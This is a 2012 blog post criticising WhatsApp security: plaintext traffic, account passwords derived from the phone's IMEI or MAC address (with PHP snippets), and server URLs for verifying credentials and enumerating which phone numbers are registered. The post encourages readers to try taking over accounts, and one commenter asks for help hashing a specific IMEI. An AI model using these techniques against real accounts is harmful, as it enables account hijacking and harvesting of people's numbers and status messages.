Whats up WhatsApp?

Posted: September 15, 2012 by BlackPian0 in Cyber Security, Mobile Security, Security Updates, Technology
Tags: , , ,

WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than ~1billion messages per day has some serious security problems. I will try to give a detailed analysis on some of the issues.

Encryption

Until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. When using WhatsApp in a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software will encrypt messages.

However, the users mobile phone number is still being transferred in plaintext: WhatsApp still revealing users phone number after encryption update

Authentication

The authentication is a security nightmare. On Android, the password is a md5 hash of the reversed IMEI number:


$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash

On iOS devices the password is generated from the devices WLAN MAC address:


$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice

The username is the users mobile phone number – an attacker would probably already know the number.

The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the users device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a users WhatsApp account¹. But how? Well, some people have done a excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI

Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse engineered API!

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number (without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)) / Note that the WhatsAPP UDID has nothing to with the Apple UDID - it is something completely different.

If you did everything right, the server will answer with a XML:

Privacy

When WhatsApp starts it will send all numbers from your phones address book to the WhatsApp servers and check which numbers are registered with WhatsApp.

This is done like this:

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4$countrycode =  the country calling code
$yournumber = while this SHOULD be your number, it is not required, the API will accept any number 
$friendX = phone number (without the country calling code) from the address book that will be checked, u[] is an array so it is possible to check multiple numbers with one request

The server will answer with a XML document showing all numbers (hits) that were registered with WhatsApp, this will look something like this:

Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. JID is the JabberID and “NP” yet – if you have smart guess let me know. All this information is public.

Local database encryption

Since this requires physical access to the device or a full backup (in both cases you are screwed anyway) this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report

Conclusion

 Do not use WhatsApp. Really, dont.

 

 

Credit: geeknizer

Comments
  1. Eitan says:

    tnx for your post! do you have the source files of the WhatsApp api project?

  2. blackrose says:

    hallo sir
    could you please help me i don’t understand how i can calculate the MD5 from IMEI manually
    the EMEI 36828900211284

  3. Highly energetic blog, I enjoyed that a lot. Will there be a
    part 2?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s